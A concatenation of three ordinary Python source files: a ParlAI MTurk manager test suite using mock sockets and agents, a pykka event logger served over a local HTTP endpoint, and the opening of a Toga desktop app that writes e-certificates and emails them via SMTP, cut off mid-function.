from parlai.mturk.core.dev.worlds import MTurkOnboardWorld, MTurkTaskWorld
from parlai.mturk.core.dev.agents import AssignState
from parlai.mturk.core.dev.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.dev.mturk_manager as MTurkManagerFile
import parlai.mturk.core.dev.data_model as data_model
import parlai.mturk.core.dev.shared_utils as shared_utils
import threading
from websocket_server import WebsocketServer
import json
parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
# Lets ignore the logging part
MTurkManagerFile.shared_utils.print_and_log = mock.MagicMock()
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_ASSIGNMENT_ID_3 = 'TEST_ASSIGNMENT_ID_3'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
MESSAGE_ID_3 = 'MESSAGE_ID_3'
MESSAGE_ID_4 = 'MESSAGE_ID_4'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_ACT
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE,
AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING,
AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE,
AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED,
AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
TASK_GROUP_ID_1 = 'TASK_GROUP_ID_1'
SocketManager.DEF_MISSED_PONGS = 1
SocketManager.DEF_DEAD_TIME = 0.4
shared_utils.THREAD_SHORT_SLEEP = 0.05
shared_utils.THREAD_MEDIUM_SLEEP = 0.15
MTurkManagerFile.WORLD_START_TIMEOUT = 2
TOPIC_ARN = 'topic_arn'
QUALIFICATION_ID = 'qualification_id'
HIT_TYPE_ID = 'hit_type_id'
MTURK_PAGE_URL = 'mturk_page_url'
FAKE_HIT_ID = 'fake_hit_id'
class TestMTurkWorld(MTurkTaskWorld):
def __init__(self, workers, use_episode_done):
self.workers = workers
def episode_done():
return use_episode_done()
self.episode_done = episode_done
def parley(self):
for worker in self.workers:
worker.assert_connected()
time.sleep(0.5)
def shutdown(self):
for worker in self.workers:
worker.shutdown()
class TestMTurkOnboardWorld(MTurkOnboardWorld):
def __init__(self, mturk_agent, use_episode_done):
self.mturk_agent = mturk_agent
def episode_done():
return use_episode_done()
self.episode_done = episode_done
def parley(self):
self.mturk_agent.assert_connected()
time.sleep(0.5)
def assert_equal_by(val_func, val, max_time):
start_time = time.time()
while val_func() != val:
assert (
time.time() - start_time < max_time
), "Value was not attained in specified time, last {}".format(val_func())
time.sleep(0.1)
class MockSocket:
def __init__(self):
self.last_messages = {}
self.connected = False
self.disconnected = False
self.closed = False
self.ws = None
self.fake_workers = []
self.port = None
self.launch_socket()
self.handlers = {}
while self.ws is None:
time.sleep(0.05)
time.sleep(1)
def send(self, packet):
self.ws.send_message_to_all(packet)
def close(self):
if not self.closed:
self.ws.server_close()
self.ws.shutdown()
self.closed = True
def do_nothing(self, *args):
pass
def launch_socket(self):
def on_message(client, server, message):
if self.closed:
raise Exception('Socket is already closed...')
if message == '':
return
packet_dict = json.loads(message)
if packet_dict['content']['id'] == 'WORLD_ALIVE':
self.ws.send_message(client, json.dumps({'type': 'conn_success'}))
self.connected = True
elif packet_dict['type'] == data_model.WORLD_PING:
pong = packet_dict['content'].copy()
pong['type'] = 'pong'
self.ws.send_message(
client,
json.dumps({'type': data_model.SERVER_PONG, 'content': pong}),
)
if 'receiver_id' in packet_dict['content']:
receiver_id = packet_dict['content']['receiver_id']
use_func = self.handlers.get(receiver_id, self.do_nothing)
use_func(packet_dict['content'])
def on_connect(client, server):
pass
def on_disconnect(client, server):
self.disconnected = True
def run_socket(*args):
port = 3030
while self.port is None:
try:
self.ws = WebsocketServer(port, host='127.0.0.1')
self.port = port
except OSError:
port += 1
self.ws.set_fn_client_left(on_disconnect)
self.ws.set_fn_new_client(on_connect)
self.ws.set_fn_message_received(on_message)
self.ws.run_forever()
self.listen_thread = threading.Thread(
target=run_socket, name='Fake-Socket-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
class MockAgent(object):
"""
Class that pretends to be an MTurk agent interacting through the webpage by
simulating the same commands that are sent from the core.html file.
Exposes methods to use for testing and checking status
"""
def __init__(self, hit_id, assignment_id, worker_id, task_group_id):
self.conversation_id = None
self.id = None
self.assignment_id = assignment_id
self.hit_id = hit_id
self.worker_id = worker_id
self.some_agent_disconnected = False
self.disconnected = False
self.task_group_id = task_group_id
self.ws = None
self.ready = False
self.wants_to_send = False
self.message_packet = []
def send_packet(self, packet):
def callback(*args):
pass
event_name = data_model.MESSAGE_BATCH
self.ws.send(json.dumps({'type': event_name, 'content': packet.as_dict()}))
def register_to_socket(self, ws, on_msg=None):
if on_msg is None:
def on_msg(packet):
self.message_packet.append(packet)
if packet.type == data_model.AGENT_STATE_CHANGE:
if 'conversation_id' in packet.data:
self.conversation_id = packet.data['conversation_id']
if 'agent_id' in packet.data:
self.id = packet.data['agent_id']
handler = self.make_packet_handler(on_msg)
self.ws = ws
self.ws.handlers[self.worker_id] = handler
def make_packet_handler(self, on_msg):
"""
A packet handler.
"""
def handler_mock(pkt):
if pkt['type'] == data_model.WORLD_MESSAGE:
packet = Packet.from_dict(pkt)
on_msg(packet)
elif pkt['type'] == data_model.MESSAGE_BATCH:
packet = Packet.from_dict(pkt)
on_msg(packet)
elif pkt['type'] == data_model.AGENT_STATE_CHANGE:
packet = Packet.from_dict(pkt)
on_msg(packet)
elif pkt['type'] == data_model.AGENT_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception(
'Invalid Packet type {} received in {}'.format(pkt['type'], pkt)
)
return handler_mock
def build_and_send_packet(self, packet_type, data):
msg_id = str(uuid.uuid4())
msg = {
'id': msg_id,
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data,
}
if packet_type == data_model.MESSAGE_BATCH:
msg['data'] = {
'messages': [
{
'id': msg_id,
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data,
}
]
}
self.ws.send(json.dumps({'type': packet_type, 'content': msg}))
return msg['id']
def send_message(self, text):
data = {
'text': text,
'id': self.id,
'message_id': str(uuid.uuid4()),
'episode_done': False,
}
self.wants_to_send = False
return self.build_and_send_packet(data_model.MESSAGE_BATCH, data)
def send_disconnect(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id,
'connection_id': '{}_{}'.format(self.worker_id, self.assignment_id),
}
return self.build_and_send_packet(data_model.AGENT_DISCONNECT, data)
def send_alive(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id,
}
return self.build_and_send_packet(data_model.AGENT_ALIVE, data)
class TestMTurkManagerWorkflows(unittest.TestCase):
"""
Various test cases to replicate a whole mturk workflow.
"""
def setUp(self):
patcher = mock.patch('builtins.input', return_value='y')
self.addCleanup(patcher.stop)
patcher.start()
# Mock functions that hit external APIs and such
self.server_utils = MTurkManagerFile.server_utils
self.mturk_utils = MTurkManagerFile.mturk_utils
self.server_utils.setup_server = mock.MagicMock(
return_value='https://127.0.0.1'
)
self.server_utils.setup_legacy_server = mock.MagicMock(
return_value='https://127.0.0.1'
)
self.server_utils.delete_server = mock.MagicMock()
self.mturk_utils.setup_aws_credentials = mock.MagicMock()
self.mturk_utils.calculate_mturk_cost = mock.MagicMock(return_value=1)
self.mturk_utils.check_mturk_balance = mock.MagicMock(return_value=True)
self.mturk_utils.create_hit_config = mock.MagicMock()
self.mturk_utils.setup_sns_topic = mock.MagicMock(return_value=TOPIC_ARN)
self.mturk_utils.delete_sns_topic = mock.MagicMock()
self.mturk_utils.delete_qualification = mock.MagicMock()
self.mturk_utils.find_or_create_qualification = mock.MagicMock(
return_value=QUALIFICATION_ID
)
self.mturk_utils.find_qualification = mock.MagicMock(
return_value=QUALIFICATION_ID
)
self.mturk_utils.give_worker_qualification = mock.MagicMock()
self.mturk_utils.remove_worker_qualification = mock.MagicMock()
self.mturk_utils.create_hit_type = mock.MagicMock(return_value=HIT_TYPE_ID)
self.mturk_utils.subscribe_to_hits = mock.MagicMock()
self.mturk_utils.create_hit_with_hit_type = mock.MagicMock(
return_value=(MTURK_PAGE_URL, FAKE_HIT_ID, 'MTURK_HIT_DATA')
)
self.mturk_utils.get_mturk_client = mock.MagicMock(
return_value=mock.MagicMock()
)
self.onboarding_agents = {}
self.worlds_agents = {}
# Set up an MTurk Manager and get it ready for accepting workers
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['frontend_version'] = 1
self.opt['assignment_duration_in_seconds'] = 1
self.opt['hit_title'] = 'test_hit_title'
self.opt['hit_description'] = 'test_hit_description'
self.opt['task_description'] = 'test_task_description'
self.opt['hit_keywords'] = 'test_hit_keywords'
self.opt['reward'] = 0.1
self.opt['is_debug'] = True
self.opt['log_level'] = 0
self.opt['num_conversations'] = 1
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager.port = self.fake_socket.port
self.mturk_manager.setup_server()
self.mturk_manager.start_new_run()
self.mturk_manager.ready_to_accept_workers()
self.mturk_manager.set_get_onboard_world(self.get_onboard_world)
self.mturk_manager.create_hits()
def assign_worker_roles(workers):
workers[0].id = 'mturk_agent_1'
workers[1].id = 'mturk_agent_2'
def run_task_wait():
self.mturk_manager.start_task(
lambda w: True, assign_worker_roles, self.get_task_world
)
self.task_thread = threading.Thread(target=run_task_wait)
self.task_thread.start()
self.agent_1 = MockAgent(
TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1, TEST_WORKER_ID_1, TASK_GROUP_ID_1
)
self.agent_1_2 = MockAgent(
TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_3, TEST_WORKER_ID_1, TASK_GROUP_ID_1
)
self.agent_2 = MockAgent(
TEST_HIT_ID_2, TEST_ASSIGNMENT_ID_2, TEST_WORKER_ID_2, TASK_GROUP_ID_1
)
def tearDown(self):
for key in self.worlds_agents.keys():
self.worlds_agents[key] = True
self.mturk_manager.shutdown()
self.fake_socket.close()
if self.task_thread.isAlive():
self.task_thread.join()
def get_onboard_world(self, mturk_agent):
self.onboarding_agents[mturk_agent.worker_id] = False
def episode_done():
return not (
(mturk_agent.worker_id in self.onboarding_agents)
and (self.onboarding_agents[mturk_agent.worker_id] is False)
)
return TestMTurkOnboardWorld(mturk_agent, episode_done)
def get_task_world(self, mturk_manager, opt, workers):
for worker in workers:
self.worlds_agents[worker.worker_id] = False
def episode_done():
for worker in workers:
if self.worlds_agents[worker.worker_id] is False:
return False
return True
return TestMTurkWorld(workers, episode_done)
def alive_agent(self, agent):
agent.register_to_socket(self.fake_socket)
agent.send_alive()
time.sleep(0.3)
def test_successful_convo(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
# Assert agents move to task
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
agent_1_object.set_completed_act({})
agent_2_object.set_completed_act({})
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
def test_disconnect_end(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
# Assert agents move to task
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Disconnect agent
agent_2.send_disconnect()
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_PARTNER_DISCONNECT, 3
)
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_DISCONNECT, 3)
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
# assert conversation not marked as complete
self.assertEqual(manager.completed_conversations, 0)
agent_1_object.set_completed_act({})
def test_expire_onboarding(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 10)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
manager._expire_onboarding_pool()
self.onboarding_agents[agent_1.worker_id] = True
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_EXPIRED)
def test_attempt_break_unique(self):
manager = self.mturk_manager
unique_worker_qual = 'is_unique_qual'
manager.is_unique = True
manager.opt['unique_qual_name'] = unique_worker_qual
manager.unique_qual_name = unique_worker_qual
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
# Assert agents move to task
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
agent_1_object.set_completed_act({})
agent_2_object.set_completed_act({})
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
# ensure qualification was 'granted'
self.mturk_utils.find_qualification.assert_called_with(
unique_worker_qual, manager.is_sandbox
)
self.mturk_utils.give_worker_qualification.assert_any_call(
agent_1.worker_id, QUALIFICATION_ID, None, manager.is_sandbox
)
self.mturk_utils.give_worker_qualification.assert_any_call(
agent_2.worker_id, QUALIFICATION_ID, None, manager.is_sandbox
)
# Try to alive with the first agent a second time
agent_1_2 = self.agent_1_2
self.alive_agent(agent_1_2)
assert_equal_by(lambda: agent_1_2.worker_id in self.onboarding_agents, True, 2)
agent_1_2_object = manager.worker_manager.get_agent_for_assignment(
agent_1_2.assignment_id
)
# No worker should be created for a unique task
self.assertIsNone(agent_1_2_object)
def test_break_multi_convo(self):
manager = self.mturk_manager
manager.opt['allowed_conversations'] = 1
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
# Assert agents move to task
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Attempt to start a new conversation with duplicate worker 1
agent_1_2 = self.agent_1_2
self.alive_agent(agent_1_2)
assert_equal_by(lambda: agent_1_2.worker_id in self.onboarding_agents, True, 2)
agent_1_2_object = manager.worker_manager.get_agent_for_assignment(
agent_1_2.assignment_id
)
# No worker should be created for a unique task
self.assertIsNone(agent_1_2_object)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
agent_1_object.set_completed_act({})
agent_2_object.set_completed_act({})
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
def test_no_onboard_expire_waiting(self):
manager = self.mturk_manager
manager.set_get_onboard_world(None)
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
manager._expire_agent_pool()
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_EXPIRED)
if __name__ == '__main__':
unittest.main(buffer=True)
|
logger.py
|
from http.server import HTTPServer, BaseHTTPRequestHandler
import threading
from functools import partial
import pykka
import random
import json
from collections import namedtuple
import enum
EventCreateNode = namedtuple('EventCreateNode', ['node', 'peers', 'distance'])
EventPeersUpdated = namedtuple('EventCreateNode', ['node', 'peers', 'distance'])
class GetEvents(enum.Enum):
Nodes = 1
Peers = 2
class HTTPRequestHandler(BaseHTTPRequestHandler):
def __init__(self, logger:pykka.ActorRef, *args, **kwargs):
self.logger:pykka.ActorRef = logger
# BaseHTTPRequestHandler calls do_GET **inside** __init__ !!!
# So we have to call super().__init__ after setting attributes.
super().__init__(*args, **kwargs)
def do_GET(self):
if self.path=="/nodes_created":
nodes = [{'id': event.node , 'label': str(event.node)} for event in self.logger.ask(GetEvents.Nodes)]
# edge = {'from': rnd, 'to': rnd2}
body = json.dumps(nodes)
print(body)
self.create_json_response(nodes)
if self.path=="/edges_updated":
edges = {}
event_dict = self.logger.ask(GetEvents.Peers)
for node_id in event_dict.keys():
# edges[node_id] = [{'id': str(node_id) + '-' + str(peer), 'from': node_id, 'to': peer, 'length': distance} for peer, distance in zip(event_dict[node_id].peers, event_dict[node_id].distance)]
edges[node_id] = [{'id': str(node_id) + '-' + str(peer), 'from': node_id, 'to': peer} for peer, distance in zip(event_dict[node_id].peers, event_dict[node_id].distance)]
body = json.dumps(edges)
print(body)
self.create_json_response(edges)
def create_json_response(self, body):
s_body = json.dumps(body) # convert to string
self.send_response(200)
self.send_header("Content-Length", str(len(s_body)))
self.send_header('Content-Type', 'application/json')
self.send_header("Access-Control-Allow-Origin", "*")
self.end_headers()
self.wfile.write(s_body.encode()) # convert to bytes
def create_server(logger:pykka.ActorRef):
handler = partial(HTTPRequestHandler, logger)
server_address = ('', 8000)
httpd = HTTPServer(server_address, handler)
httpd.serve_forever()
class DataCapture(pykka.ThreadingActor): # used to log events from Nodes
def __init__(self ):
super().__init__()
# start the http server so that data can now be access from a outside process
self.processThread = threading.Thread(target=create_server, args=(self.actor_ref,), daemon=True) # daemon: thread will die on program termination
self.processThread.start()
# events, changes that happen
self.events_node_created = []
self.events_peers_updated = {}
def on_receive(self, message):
if isinstance(message, EventCreateNode):
self.events_node_created.append(message)
print("logger EventCreateNode: " + str(message.node) + " peers" + str(message.peers))
if isinstance(message, EventPeersUpdated):
self.events_peers_updated[message.node] = message
if isinstance(message, GetEvents):
# when data is fetched, clear current events
if message==GetEvents.Nodes:
events_create_node = self.events_node_created.copy()
self.events_node_created = []
return events_create_node
if message==GetEvents.Peers:
events_peers_updated = self.events_peers_updated.copy()
self.events_peers_updated = {}
return events_peers_updated
return
|
app.py
|
"""
Application for writing e-cetrificates
"""
import os
import csv
import time
import toga
import smtplib
from toga.style import Pack
from threading import Thread
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from toga.style.pack import COLUMN, ROW
from PIL import Image, ImageDraw, ImageFont
from email.mime.multipart import MIMEMultipart
class Mailer:
def __init__(self, usr, profile, psk, server="smtp.gmail.com", port=587):
try:
self.server = str(server)
self.port = int(port)
self.mailer = smtplib.SMTP(self.server, self.port)
self.usr = str(usr)
self.profile = str(profile)
self.mailer.ehlo()
self.mailer.starttls()
self.mailer.ehlo()
self.mailer.login(user=self.usr, password=str(psk))
except:
self.mailer = None
def send_mail(self, reciever_maildid, subject, message, image_fp=None):
try:
msg = MIMEMultipart()
if image_fp is not None:
img_data = open(image_fp, "rb").read()
image = MIMEImage(img_data, name=os.path.basename(image_fp))
msg.attach(image)
msg["Subject"] = str(subject) if len(str(subject)) > 0 else "Test Mail"
msg["From"] = f"{self.profile}<{self.usr}>"
msg["To"] = ", ".join([reciever_maildid])
text = MIMEText(str(message) if len(str(message)) > 0 else "Test Mail")
msg.attach(text)
self.mailer.sendmail(self.usr, reciever_maildid, msg.as_string())
return ["mail has been initiated", time.ctime()]
except:
return ["mail failed to send", time.ctime()]
class CertificAtor(toga.App):
def startup(self):
"""
Construct and show the Toga application.
Usually, you would add your application to a main content box.
We then create a main window (with a name matching the app), and
show the main window.
"""
self.content = {
"st": "Small Text",
"mt": "Medium Text",
"lt": "Large Text",
"x": "X Coordinate",
"y": "Y Coordinate",
"th": "Table Column",
"fs": "Font Size",
"tl": "Character Length",
}
self.headings, self.data, self.write_certificate = None, None, None
(
self.image_file_name,
self.tmp_filen,
self.csv_file_name,
self.font_file_name,
) = ("", "", "", "")
self.image_file_width, self.image_file_height = 1000, 1000
self.coord = {}
self.bnd_box = 0
self.text_list = []
self.left_panel = toga.Box(style=Pack(direction=COLUMN))
self.file_name_label = toga.Label(
"Image File : None", style=Pack(padding=5, flex=1)
)
self.font_label_loc = toga.Label(
"Font File : None", style=Pack(padding=10, flex=1)
)
self.fetch_button = toga.Button(
"Open", id="open", style=Pack(padding=5), on_press=self.fetch
)
self.certificate_box = toga.Box(
style=Pack(direction=ROW, padding=5),
children=[self.file_name_label, self.fetch_button],
)
self.name_container = toga.Box(style=Pack(direction=ROW, padding=5))
self.add_name_button = toga.Button(
"Add Label ", id="add", style=Pack(padding=5, flex=1), on_press=self.fetch
)
self.add_font_file = toga.Button(
"Change Font", id="font", style=Pack(padding=5, flex=1), on_press=self.fetch
)
self.name_box = toga.Box(style=Pack(direction=ROW, padding=5))
self.name_scroller = toga.ScrollContainer(
style=Pack(flex=1), content=self.name_box
)
self.image_view = toga.ImageView(style=Pack(flex=1, padding=5))
self.image_tool = toga.SplitContainer(
id="image_tool",
style=Pack(flex=1, padding=5),
content=[self.image_view, self.name_scroller],
)
self.send_emails = toga.Button(
"Send Email",
id="emails",
style=Pack(padding=5, flex=1),
enabled=True,
on_press=self.get_mail_window,
)
self.open_csv = toga.Button(
"Select a CSV File",
id="open_csv",
style=Pack(padding=5, flex=1),
enabled=False,
on_press=self.fetch,
)
self.write_certificate = toga.Button(
"Write Certificate",
id="",
style=Pack(padding=5, flex=1),
enabled=False,
on_press=self.write_interface,
)
self.bottom_button_box = toga.Box(
style=Pack(padding=5, direction=ROW),
children=[
self.add_name_button,
self.add_font_file,
self.open_csv,
self.write_certificate,
self.send_emails,
],
)
self.loading = toga.ProgressBar(style=Pack(padding=5))
self.left_panel.add(
self.image_tool,
self.loading,
self.name_container,
self.certificate_box,
self.font_label_loc,
self.bottom_button_box,
)
self.main_window = toga.MainWindow(title=self.formal_name)
self.csv_window = toga.Window(title=self.formal_name, closeable=False)
self.main_window.content = self.left_panel
self.csv_window.content = toga.Box(style=Pack(direction=COLUMN, padding=5))
self.csv_window.show()
self.main_window.show()
def fetch(self, widget):
if widget.id == "open" or (widget.id == "add" and self.image_file_name == ""):
temp = self.main_window.open_file_dialog(
"Select a Image File", file_types=["jpg", "png"]
)
self.image_file_name = (
str(temp) if temp is not None else self.image_file_name
)
self.file_name_label.text = "Image File : " + self.image_file_name
if self.image_file_name != "":
self.tmp_filen = f"{self.image_file_name}_temp.jpg"
self.image_view.image = toga.Image(self.image_file_name)
im = Image.open(self.image_file_name)
self.image_file_width, self.image_file_height = im.size
del im
if widget.id == "font" or (widget.id == "add" and self.font_file_name == ""):
temp = self.main_window.open_file_dialog(
"Select a ttf File", file_types=["ttf"]
)
self.font_file_name = str(temp) if temp is not None else self.font_file_name
self.font_label_loc.text = "Font File : " + self.font_file_name
if widget.id == "open_csv" or (widget.id == "add" and self.csv_file_name == ""):
temp = self.main_window.open_file_dialog(
title="Select the csv file", file_types=["csv"]
)
self.csv_file_name = str(temp) if temp is not None else self.csv_file_name
self.get_right_panel()
if widget.id == "add":
if self.tmp_filen != "" and self.font_file_name != "":
if not self.open_csv.enabled:
self.open_csv.enabled = True
box = toga.Box(
id=f"bnd_box_{self.bnd_box}",
style=Pack(padding=5, direction=COLUMN),
)
label = toga.Label(
"Text:", id=f"textlabel_{self.bnd_box}", style=Pack(padding=5)
)
items = (
[""] + list(self.headings.keys())
if self.headings is not None
else []
)
self.text_list.append(
toga.TextInput(id=f"lin_{self.bnd_box}", style=(Pack(padding=5)))
)
table_label = toga.Selection(
id=f"tbl_{self.bnd_box}",
style=Pack(padding=5),
enabled=False if len(items) == 0 else True,
items=items,
on_select=self.teleport,
)
stl = toga.Label(
"Small Text Length : 0 chars",
id=f"stl_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=190),
)
stl_in = toga.Slider(
id=f"stlin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 255),
on_slide=self.teleport,
)
sts = toga.Label(
"Small Font Size : 0 pts",
id=f"sts_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=150),
)
sts_in = toga.Slider(
id=f"stsin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 100),
on_slide=self.teleport,
)
stx = toga.Label(
